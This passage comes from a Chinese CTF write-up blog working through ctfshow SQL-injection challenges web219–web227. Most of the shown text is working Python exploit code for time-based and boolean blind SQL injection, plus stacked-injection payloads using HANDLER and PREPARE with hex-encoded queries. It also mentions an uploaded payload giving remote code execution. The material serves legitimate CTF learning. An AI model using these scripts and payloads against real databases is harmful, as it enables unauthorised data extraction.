class="keyword">and</span> end - start &lt; <span class="number">0.5</span>:</span><br><span class="line">            flag += j</span><br><span class="line">            n += <span class="number">1</span></span><br><span class="line">            print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j == <span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="comment">#ctfshow&#123;92286539-ff05-4292-bcbf-7ff6fa6e31ab&#125;</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210731235226222.png" alt="image-20210731235226222"></p>
<p>第二种思路，鉴于我发现我上面的方法，flag需要多跑几次，而且方法重样，所以想多写一个其他的绕过方法，<strong>笛卡尔积时间延时法</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">笛卡尔积(因为连接表是一个很耗时的操作)</span><br><span class="line">    AxB=A和B中每个元素的组合所组成的集合，就是连接表</span><br><span class="line">    <span class="keyword">SELECT</span> <span class="keyword">count</span>(*) <span class="keyword">FROM</span> information_schema.columns A, information_schema.columns B, information_schema.tables C;</span><br><span class="line">    <span class="keyword">select</span> * <span class="keyword">from</span> table_name A, table_name B</span><br><span class="line">    <span class="keyword">select</span> * <span class="keyword">from</span> table_name A, table_name B，table_name C</span><br><span class="line">    <span class="keyword">select</span> <span class="keyword">count</span>(*) <span class="keyword">from</span> table_name A, table_name B，table_name C  表可以是同一张表</span><br></pre></td></tr></table></figure></div>

<p><strong>也就是换个bypass也而已，跑起来，这次成功率提高了很多，基本一次能跑成功</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/8/1</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">bypass=<span class="string">"select count(*) from information_schema.schemata a, information_schema.tables b, information_schema.tables c, information_schema.schemata d, information_schema.schemata e"</span></span><br><span class="line">url = <span class="string">"http://ea12a2f3-655e-44f2-b249-a95701399f73.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#1) and  if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',( concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),0)#</span></span><br><span class="line"><span class="comment">#payload = "1) and  if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;&#125;,1)='&#123;&#125;',(&#123;&#125;),0)#"</span></span><br><span class="line"><span class="comment">#payload = "1) and  if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxca'),&#123;&#125;,1)='&#123;&#125;',(&#123;&#125;),0)#"</span></span><br><span class="line">payload = <span class="string">"1) and  if(substr((select group_concat(flagaabc) from ctfshow_flagxca),&#123;&#125;,1)='&#123;&#125;',(&#123;&#125;),0)#"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">666</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">"ip"</span>: payload.format(i,j,bypass),</span><br><span class="line">            <span class="string">"debug"</span>: <span class="string">'0'</span></span><br><span class="line">        &#125;</span><br><span class="line">        start = time.time()</span><br><span class="line">        res = requests.post(url, data)</span><br><span class="line">        end = time.time()</span><br><span class="line">        print(end - start)</span><br><span class="line">        <span class="keyword">if</span> end - start &gt; <span class="number">1.5</span> <span class="keyword">and</span> end - start &lt; <span class="number">5</span>:</span><br><span class="line">            flag += j</span><br><span class="line">            n += <span class="number">1</span></span><br><span class="line">            print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j == <span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="comment">#ctfshow&#123;92286539-ff05-4292-bcbf-7ff6fa6e31ab&#125;</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801002919738.png" alt="image-20210801002919738"></p>
<h2 id="web220"><a href="#web220" class="headerlink" title="web220"></a>web220</h2><blockquote>
<ul>
<li>和布尔盲注一样，过滤substr，但是还有正则，或者left都可以，我们这里用正则写一个脚本，因为还过滤了concat所以不能用group_concat改用limit</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/8/1</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">bypass=<span class="string">"select count(*) from information_schema.schemata a, information_schema.tables b, information_schema.tables c, information_schema.schemata d, information_schema.schemata e, information_schema.schemata f"</span></span><br><span class="line">url = <span class="string">"http://d82b1a0b-aba4-4fed-aa83-62d59d7df4ee.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#1) and if((database())regexp('^ctfshow'),(select count(*) from information_schema.schemata a, information_schema.tables b, information_schema.tables c, information_schema.schemata d, information_schema.schemata e, information_schema.schemata f),0)#</span></span><br><span class="line"><span class="comment">#payload = "1) and if((database())regexp('^&#123;&#125;'),(&#123;&#125;),0)#"</span></span><br><span class="line"><span class="comment">#payload = "1) and if((select table_name from information_schema.tables where table_schema=database() limit 0,1)regexp('^&#123;&#125;'),(&#123;&#125;),0)#"</span></span><br><span class="line"><span class="comment">#payload = "1) and if((select column_name from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxcac' limit 1,1)regexp('^&#123;&#125;'),(&#123;&#125;),0)#"</span></span><br><span class="line">payload = <span class="string">"1) and if((select flagaabcc from ctfshow_flagxcac limit 0,1)regexp('^&#123;&#125;'),(&#123;&#125;),0)#"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">666</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">"ip"</span>: payload.format(flag + j,bypass),</span><br><span class="line">            <span class="string">"debug"</span>: <span class="string">'0'</span></span><br><span class="line">        &#125;</span><br><span class="line">        start = time.time()</span><br><span class="line">        res = requests.post(url, data)</span><br><span class="line">        end = time.time()</span><br><span class="line">        <span class="keyword">if</span> end - start &gt; <span class="number">3</span> <span class="keyword">and</span> end - start &lt; <span class="number">5</span>:</span><br><span class="line">            flag += j</span><br><span class="line">            n += <span class="number">1</span></span><br><span class="line">            print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j == <span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801011111531.png" alt="image-20210801011111531"></p>
<h2 id="web221"><a href="#web221" class="headerlink" title="web221"></a>web221</h2><blockquote>
<ul>
<li>考点是：MySQL利用procedure analyse()函数优化表结构<br>limit后面能跟的也只有这个了似乎</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># http://196cf3fd-f920-4018-a714-662ad61571e9.chall.ctf.show/api/?page=1&amp;limit=1 procedure analyse(extractvalue(rand(),concat(0x3a,database())),2)</span></span><br><span class="line"></span><br><span class="line">可以参考</span><br><span class="line"><span class="comment"># https://www.jb51.net/article/99980.htm</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web222"><a href="#web222" class="headerlink" title="web222"></a>web222</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//分页查询</span><br><span class="line">$sql = <span class="keyword">select</span> * <span class="keyword">from</span> ctfshow_user <span class="keyword">group</span> <span class="keyword">by</span> $username;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li><strong>不懂group by建议看一下这一篇关于group报错注入<a href="https://www.cnblogs.com/02SWD/p/CTF-sql-group_by.html，可以理解一下，因为group" target="_blank" rel="noopener">https://www.cnblogs.com/02SWD/p/CTF-sql-group_by.html，可以理解一下，因为group</a> by后面只能跟字段和字符串，所以我们构造字符串，利用<code>concat(sleep(0.10),1)</code>可以成功执行sleep()函数，我们再利用if来条件判断，就可以实现时间盲注，写一个脚本跑一波</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/8/1</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://9a446c1a-4acd-4873-a290-53b36046a7b9.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#-------------------------------------------------------------------------------------------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">#查表</span></span><br><span class="line"><span class="comment"># sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()"</span></span><br><span class="line"><span class="comment">#查字段</span></span><br><span class="line"><span class="comment"># sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flaga'"</span></span><br><span class="line"><span class="comment">#查flag</span></span><br><span class="line">sql= <span class="string">"select flagaabc from ctfshow_flaga"</span></span><br><span class="line"><span class="comment">#-------------------------------------------------------------------------------------------------------------------------------------------------------------</span></span><br><span class="line">payload = <span class="string">"concat(if(substr((&#123;&#125;),&#123;&#125;,1)='&#123;&#125;',sleep(0.10),0),1)"</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#concat(if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',sleep(0.10),0),1)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">666</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        params = &#123;</span><br><span class="line">            <span class="string">'u'</span> : payload.format(sql,i,j)</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        start = time.time()</span><br><span class="line">        res = requests.get(url = url, params = params)</span><br><span class="line">        end = time.time()</span><br><span class="line">        <span class="keyword">if</span> end - start &gt; <span class="number">2</span> <span class="keyword">and</span> end - start &lt; <span class="number">3</span>:</span><br><span class="line">            flag += j</span><br><span class="line">            n += <span class="number">1</span></span><br><span class="line">            print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j == <span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801082210482.png" alt="image-20210801082210482"></p>
<h2 id="web223"><a href="#web223" class="headerlink" title="web223"></a>web223</h2><blockquote>
<ul>
<li><strong>这题多了个过滤，将数字全部过滤了，我们可以考虑用true来代替数字，所以这题我发现有两种方式一种是时间盲注（但是延时是20秒），另一种是布尔盲注，这把我们就用布尔速度快。看你喜好。</strong></li>
</ul>
</blockquote>
<p><strong>说一下原理，为什么使用布尔盲注，当if返回这true的时候，执行username就会group by username，数据就会多一些，但是当false就会当做字符串，数据就少一些，上两张图看看</strong></p>
<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801103638060.png" alt="image-20210801103638060"></p>
</blockquote>
<p><strong>当if条件为false时，数据回显就少了，根据这个可以布尔盲注</strong></p>
<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801103725888.png" alt="image-20210801103725888"></p>
</blockquote>
<p>上脚本布尔，跑的快些，比时间盲注</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/8/1</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="comment">#import time</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">generateNum</span><span class="params">(num)</span>:</span></span><br><span class="line">    res = <span class="string">'true'</span></span><br><span class="line">    <span class="keyword">if</span> num == <span class="number">1</span>:</span><br><span class="line">        <span class="keyword">return</span> res</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(num<span class="number">-1</span>):</span><br><span class="line">            res += <span class="string">"+true"</span></span><br><span class="line">        <span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://ce009cf2-8652-4737-ba07-b3bfc3bc3a4a.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#*************************************************************************************************************************************************************</span></span><br><span class="line"><span class="comment">#--------查表</span></span><br><span class="line"><span class="comment">#sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()"</span></span><br><span class="line"><span class="comment">#--------查字段</span></span><br><span class="line"><span class="comment">#sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagas'"</span></span><br><span class="line"><span class="comment">#--------查flag</span></span><br><span class="line">sql= <span class="string">"select flagasabc from ctfshow_flagas"</span></span><br><span class="line"><span class="comment">#*************************************************************************************************************************************************************</span></span><br><span class="line">payload = <span class="string">"if(ascii(substr((&#123;&#125;),&#123;&#125;,true))=(&#123;&#125;),username,false)"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#计数</span></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">666</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">126</span>):</span><br><span class="line">        result_num=generateNum(i)</span><br><span class="line">        result=generateNum(j)</span><br><span class="line">        params = &#123;</span><br><span class="line">            <span class="string">'u'</span> : payload.format(sql,result_num,result)</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        res = requests.get(url = url, params = params)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"userAUTO"</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            flag += chr(j)</span><br><span class="line">            n += <span class="number">1</span></span><br><span class="line">            print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j == <span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="comment">#ctfshow&#123;728dd1b0-7547-401d-b358-2d2207f3d13c&#125;</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801104156781.png" alt="image-20210801104156781"></p>
<h2 id="web224"><a href="#web224" class="headerlink" title="web224"></a>web224</h2><blockquote>
<ul>
<li>我以为是输入框注入，没想到是文件注入，有一个君子协议里面可以重置密码robots.txt</li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801115756350.png" alt="image-20210801115756350"></p>
<p>登陆之后发现是一个上传点，什么都上传不进去，群里有一个payload.bin，上传就自动生成1.php，就直接是rce了，拿flag</p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801122038785.png" alt="image-20210801122038785"></p>
<h2 id="web225"><a href="#web225" class="headerlink" title="web225"></a>web225</h2><p>第一种做法，handle，因为堆叠注入，除了过滤的语句，基本是任意执行</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 打开一个表名为 tbl_name 的表的句柄</span></span><br><span class="line"><span class="keyword">HANDLER</span> tbl_name <span class="keyword">OPEN</span> [ [<span class="keyword">AS</span>] <span class="keyword">alias</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment"># 1、通过指定索引查看表，可以指定从索引那一行开始，通过 NEXT 继续浏览</span></span><br><span class="line"><span class="keyword">HANDLER</span> tbl_name <span class="keyword">READ</span> index_name &#123; = | &lt;= | &gt;= | &lt; | &gt; &#125; (value1,value2,...)</span><br><span class="line">    [ <span class="keyword">WHERE</span> where_condition ] [<span class="keyword">LIMIT</span> ... ]</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2、通过索引查看表</span></span><br><span class="line"><span class="comment"># FIRST: 获取第一行（索引最小的一行）</span></span><br><span class="line"><span class="comment"># NEXT: 获取下一行</span></span><br><span class="line"><span class="comment"># PREV: 获取上一行</span></span><br><span class="line"><span class="comment"># LAST: 获取最后一行（索引最大的一行）</span></span><br><span class="line"><span class="keyword">HANDLER</span> tbl_name <span class="keyword">READ</span> index_name &#123; <span class="keyword">FIRST</span> | <span class="keyword">NEXT</span> | PREV | <span class="keyword">LAST</span> &#125;</span><br><span class="line">    [ <span class="keyword">WHERE</span> where_condition ] [<span class="keyword">LIMIT</span> ... ]</span><br><span class="line"></span><br><span class="line"><span class="comment"># 3、不通过索引查看表</span></span><br><span class="line"><span class="comment"># READ FIRST: 获取句柄的第一行</span></span><br><span class="line"><span class="comment"># READ NEXT: 依次获取其他行（当然也可以在获取句柄后直接使用获取第一行）</span></span><br><span class="line"><span class="comment"># 最后一行执行之后再执行 READ NEXT 会返回一个空的结果</span></span><br><span class="line"><span class="keyword">HANDLER</span> tbl_name <span class="keyword">READ</span> &#123; <span class="keyword">FIRST</span> | <span class="keyword">NEXT</span> &#125;</span><br><span class="line">    [ <span class="keyword">WHERE</span> where_condition ] [<span class="keyword">LIMIT</span> ... ]</span><br><span class="line"></span><br><span class="line"><span class="comment"># 关闭已打开的句柄</span></span><br><span class="line"><span class="keyword">HANDLER</span> tbl_name <span class="keyword">CLOSE</span></span><br></pre></td></tr></table></figure></div>

<p><strong>payload</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://76114b3b-7ffd-4016-8b00-b96feb693fd8.challenge.ctf.show:<span class="number">8080</span>/api/?username=ctfshow<span class="string">';handler ctfshow_flagasa open;handler ctfshow_flagasa read first--+</span></span><br></pre></td></tr></table></figure></div>

<p><strong>第二种做法预处理</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SET</span> @tn = <span class="string">'hahaha'</span>;  //存储表名</span><br><span class="line"><span class="keyword">SET</span> @<span class="keyword">sql</span> = <span class="keyword">concat</span>(<span class="string">'select * from '</span>, @tn);  //存储SQL语句</span><br><span class="line"><span class="keyword">PREPARE</span> <span class="keyword">name</span> <span class="keyword">from</span> @<span class="keyword">sql</span>;   //预定义SQL语句</span><br><span class="line"><span class="keyword">EXECUTE</span> <span class="keyword">name</span>;  //执行预定义SQL语句</span><br><span class="line">(<span class="keyword">DEALLOCATE</span> || <span class="keyword">DROP</span>) <span class="keyword">PREPARE</span> sqla;  //删除预定义SQL语句</span><br></pre></td></tr></table></figure></div>

<p>因为concat连接之后直接就是字符串，所以就直接构造payload</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://76114b3b-7ffd-4016-8b00-b96feb693fd8.challenge.ctf.show:<span class="number">8080</span>/api/?username=ctfshow<span class="string">';show tables;prepare gylq from concat('</span>s<span class="string">','</span>elect<span class="string">','</span> * <span class="keyword">from</span> ctfshow_flagasa<span class="string">');execute gylq;--+</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web226"><a href="#web226" class="headerlink" title="web226"></a>web226</h2><blockquote>
<ul>
<li>预处理from后面可以跟十六进制，所以可以有更骚的姿势，直接将<code>select * from ctfsh_ow_flagas</code>转换成<code>0x73656C656374202A2066726F6D2063746673685F6F775F666C61676173</code>就可以直接语句执行</li>
</ul>
</blockquote>
<p>payload</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://bbec116e-8f61-487c-8966-9384be4efe14.challenge.ctf.show:<span class="number">8080</span>/api/?username=userAUTO<span class="string">';prepare gylq from 0x73656C656374202A2066726F6D2063746673685F6F775F666C61676173;execute gylq--+</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web227"><a href="#web227" class="headerlink" title="web227"></a>web227</h2><blockquote>
<ul>
